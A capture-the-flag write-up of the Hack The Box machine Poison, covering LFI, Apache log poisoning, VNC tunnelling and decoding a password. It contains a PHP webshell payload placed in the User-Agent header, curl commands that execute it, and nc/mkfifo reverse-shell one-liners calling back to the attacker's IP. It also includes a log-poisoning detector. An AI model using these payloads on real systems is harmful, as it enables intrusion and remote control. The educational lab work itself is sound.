🕵 HTB-Writeup : POISON

Recon

nmap x rustscan

└─$ rustscan -a 10.10.10.84 -b 10000 -- -A -Pn -sV -T5
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFLpOCLU3rRUdNNbb5u5WlP+JKUpoYw4znHe0n4mRlv5sQ5kkkZSDNMqXtfWUFzevPaLaJboNBOAXjPwd1OV1wL2YFcGsTL5MOXgTeW4ixpxNBsnBj67mPSmQSaWcudPUmhqnT5VhKYLbPk43FsWqGkNhDtbuBVo9/BmN+GjN1v7w54PPtn8wDd7Zap3yStvwRxeq8E0nBE4odsfBhPPC01302RZzkiXymV73WqmI8MeF9W94giTBQS5swH6NgUe4/QV1tOjTct/uzidFx+8bbcwcQ1eUgK5DyRLaEhou7PRlZX6Pg5YgcuQUlYbGjgk6ycMJDuwb2D5mJkAzN4dih
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKXh613KF4mJTcOxbIy/3mN/O/wAYht2Vt4m9PUoQBBSao16RI9B3VYod1HSbx3PYsPpKmqjcT7A/fHggPIzDYU=
|   256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJrg2EBbG5D2maVLhDME5mZwrvlhTXrK7jiEI+MiZ+Am
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

We are facing a FreeBSD machine :/ Two ports are open: ssh and http.

Browsing to http://10.10.10.84/ we land on a “temporary website” where we can test some PHP scripts.


The website lists some pages:

  • ini.php
  • info.php: leaks the machine name and the version, FreeBSD 11.1-RELEASE
  • listfiles.php: leaks the existence of a file, pwdbackup.txt
  • phpinfo.php: leaks PHP information (PHP v5.6.32)

pwdbackup.txt exposes a “secure” password that appears to be base64-encoded, 13 times according to the sentence at the top of the file.

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

Passing the blob through a base64 decoder 13 times, we get the password Charix!2#4%6&8(0.
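Rather than pasting the blob into a decoder 13 times by hand, the layers can be peeled programmatically. This is an added example, not part of the original writeup: it strips nested base64 until the data stops being valid base64, and builds its own constructed 13-layer sample (the secret used here is made up, not the box's real password).

```python
import base64
import binascii
import re

# Characters allowed in a single padded base64 string.
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def peel_base64(blob, max_layers=64):
    """Strip nested base64 layers until the data is no longer valid base64.

    Returns (innermost_bytes, layers_removed). Caveat: a plaintext that
    happens to be valid base64 itself would be peeled one layer too far,
    so compare layers_removed with the count you expect (13 on Poison).
    """
    data = blob.encode() if isinstance(blob, str) else blob
    layers = 0
    while layers < max_layers:
        # pwdbackup.txt wraps the blob at 76 columns: drop all whitespace first.
        compact = b"".join(data.split())
        if (not compact or len(compact) % 4
                or not B64_ALPHABET.match(compact.decode("ascii", "replace"))):
            break
        try:
            decoded = base64.b64decode(compact, validate=True)
        except binascii.Error:
            break
        data = decoded
        layers += 1
    return data, layers


def wrap_n_times(secret, n):
    """Constructed sample: encode `secret` n times, wrapped at 76 columns
    with newlines like the `base64` CLI output found in pwdbackup.txt."""
    data = secret.encode()
    for _ in range(n):
        data = base64.encodebytes(data)
    return data.decode()


if __name__ == "__main__":
    sample = wrap_n_times("not-the-real-password!", 13)   # constructed
    print(peel_base64(sample))
```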

I first try to connect to the box over ssh with the credentials charix:Charix!2#4%6&8(0, guessing that the first word of the password is the username, and…


Welcome to FreeBSD!

charix@Poison:~ % cat /home/charix/user.txt 
**************************04209c

We got our first shell! And the user flag :)

Path to the privesc

Local recon

In charix's home directory we find a zip archive named secret.zip. Decompressing it fails because the archive is password protected.

So I try to brute-force the password with john.

# get hash from zip2john
└─$ zip2john secret.zip > hash.txt

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt               

But it failed.

Then I run a scan with LinEnum to look for anything interesting, but I can't find any useful information (crontab, running processes, etc).

Thinking about logs

The box is named Poison, which makes me think of a well-known technique called log poisoning. Log poisoning consists of injecting malicious code into log files, which becomes dangerous when those files are later included by a script.

I search the log directory and find a log named httpd-access.log, which records every request made to the web server.

Indeed, we can find there our requests to http://10.10.10.84/browse.php:

charix@Poison:/var/log % tail httpd-access.log

10.10.16.7 - - [30/Aug/2022:00:09:42 +0200] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:09:44 +0200] "GET /browse.php?file=info.php HTTP/1.1" 200 157 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:09:46 +0200] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:10:11 +0200] "GET /browse.php?file=COUCOU HTTP/1.1" 200 357 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"

Now that we know that everything is logged, we can try to do some log poisoning.

Thanks to this article, I learned how logs can be manipulated to execute commands.

To do so, we need access to the log file through an LFI. I check whether an LFI is possible by retrieving a file through the form: http://10.10.10.84/browse.php?file=..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fhttpd-access.log

We are able to read httpd-access.log through the LFI.


Exploiting logs

With Burp, we intercept the web request to the log file (http://10.10.10.84/browse.php?file=../../../../../var/log/httpd-access.log) and replace the User-Agent header with the payload below.

<?php system($_GET['cmd']); ?>

Then we send the request. Our payload is now in the log file, and since browse.php includes that file, the PHP is evaluated on every read. We can check that it works by sending commands through it.

# sending a 'ls -al' command
└─$ curl "http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al"

10.10.16.7 - - [30/Aug/2022:01:08:51 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 879 "-" "total 72
drwxr-xr-x  2 root  wheel   512 Mar 19  2018 .
drwxr-xr-x  6 root  wheel   512 Jan 24  2018 ..
-rw-r--r--  1 root  wheel    33 Jan 24  2018 browse.php
-rw-r--r--  1 root  wheel   289 Jan 24  2018 index.php
-rw-r--r--  1 root  wheel    27 Jan 24  2018 info.php
-rw-r--r--  1 root  wheel    33 Jan 24  2018 ini.php
-rw-r--r--  1 root  wheel    90 Jan 24  2018 listfiles.php
-rw-r--r--  1 root  wheel    20 Jan 24  2018 phpinfo.php
-rw-r--r--  1 root  wheel  1267 Mar 19  2018 pwdbackup.txt
"
10.10.16.7 - - [30/Aug/2022:01:09:05 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al HTTP/1.1" 200 1499 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"

It works! Let's try to get a reverse shell. The LinEnum scan found that the netcat command is available.

# Listen on Host
└─$ rlwrap nc -lvnp 4444

# try to get reverse shell using 'nc' then '/dev/tcp'
# /usr/bin/nc 10.10.16.7 4444 -e sh
└─$ curl "http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=/usr/bin/nc%2010.10.16.7%204444%20-e%20sh"

Sadly, it does not work (the FreeBSD nc has no -e option). The PentestMonkey cheatsheet provides a second method that can give a reverse shell when the basic one fails.

# alternative netcat reverse shell
#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f
└─$ curl "http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.16.7%204444%20%3E/tmp/f"

And we got another shell with the www user.

└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.84] 17534
sh: can't access tty; job control turned off
whoami
www

At this point, I can't find anything useful with that user. But it was cool to apply this technique.
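From the defender's side, the poisoned lines above stand out clearly in httpd-access.log. The following is an added Python example (not from the original writeup) that parses Apache combined-format lines and flags directory traversal in the file parameter, PHP tags in the User-Agent or Referer, and a cmd parameter sent together with a log path; the sample log lines are constructed to mirror the ones shown in this post.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format as used by httpd-access.log on the box.
# Quoted fields may contain backslash-escaped quotes, which Apache emits
# when a client sends '"' in the User-Agent or Referer.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def analyse_line(line):
    """Return the reasons this log line looks like LFI / log poisoning.

    Lines that no longer parse are reported too: command output written
    into the log (see the 'ls -al' listing above) breaks the line format,
    which is itself a strong signal that the log has been poisoned."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return ["unparseable"]
    reasons = []
    parts = m.group("req").split(" ")
    target = parts[1] if len(parts) > 1 else ""
    # parse_qs decodes once; decode again to catch double-encoded '../'.
    params = {k: [unquote(v) for v in vs]
              for k, vs in parse_qs(urlsplit(target).query).items()}
    for value in params.get("file", []):
        if "../" in value or value.startswith("/"):
            reasons.append("lfi:" + value)
    if "cmd" in params and any("log" in v for v in params.get("file", [])):
        reasons.append("rce_via_log")
    for field in ("ua", "ref"):
        if PHP_TAG.search(m.group(field)):
            reasons.append("php_tag_in_" + field)
    return reasons


def scan(lines):
    """Map 1-based line number -> reasons, for every line that raised a flag."""
    return {i: r for i, r in ((i, analyse_line(l)) for i, l in enumerate(lines, 1)) if r}


SAMPLE_LOG = [  # constructed sample lines, modelled on the ones in this writeup
    '10.10.16.7 - - [30/Aug/2022:00:09:42 +0200] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0"',
    '10.10.16.7 - - [30/Aug/2022:00:12:03 +0200] "GET /browse.php?file=..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 879 "-" "Mozilla/5.0"',
    '10.10.16.7 - - [30/Aug/2022:00:13:10 +0200] "GET /browse.php?file=../../../../../var/log/httpd-access.log HTTP/1.1" 200 879 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.10.16.7 - - [30/Aug/2022:00:14:01 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al HTTP/1.1" 200 1499 "-" "Mozilla/5.0"',
]
```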

Go back in time

I decide to go back and spend more time on the secret.zip archive found earlier. I also check whether there are any active network connections.

I try netstat -lnptu, but some of those options do not exist on FreeBSD. A quick search gives the FreeBSD equivalent.

# show listening connection
sockstat -l 

charix@Poison:~ % sockstat -l

USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS      
root     sendmail   653   3  tcp4   127.0.0.1:25          *:*
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*

We find two potentially interesting listening services, sendmail and Xvnc, both bound to localhost only. I first search for Xvnc vulnerabilities with searchsploit.

# checking version
charix@Poison:/tmp % Xvnc -version
Xvnc version TightVNC-1.3.10


└─$ searchsploit TightVNC 
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
TightVNC - Authentication Failure Integer Overflow (PoC)               | windows/dos/8024.py
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows  | windows/dos/7990.py
----------------------------------------------------------------------- ---------------------------------

We found an Integer Overflow! Let’s try the exploit!

Exploit Xvnc service

Unfortunately I was not able to exploit this vulnerability. I did, however, manage to reach the VNC service locally.

Since the VNC server only listens on the box's loopback interface, we use ssh local port forwarding (the -L option) to expose it on our machine.

# From HOST 
└─$ ssh -L 5901:localhost:5901 charix@10.10.10.84

# From HOST
└─$ vncviewer localhost:5901                   
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password: Charix!2#4%6&8(0
Authentication failed

We now have access to VNC. I try the password we already have, but we get an “Authentication failed”.

And then… 🤦‍♂️🤦‍♂️🤦‍♂️

Could the archive password simply be charix's own password?

└─$ unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password: Charix!2#4%6&8(0
 extracting: secret                  

Looking at the vncviewer options, I found that a password file can be used to authenticate, and the extracted secret file is exactly that.

└─$ vncviewer localhost:5901 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"

We get a root shell, we can get the flag :)


Tags

Log Poisoning, FreeBSD, Easy, External, Apache, Penetration Tester Level 1, Local File Inclusion, A08:2021-Software And Data Integrity Failures, Use Of Injection Attacks, VNC, Confidentiality, Weak Authentication, Network, Password Reuse, Tunneling, Port Forwarding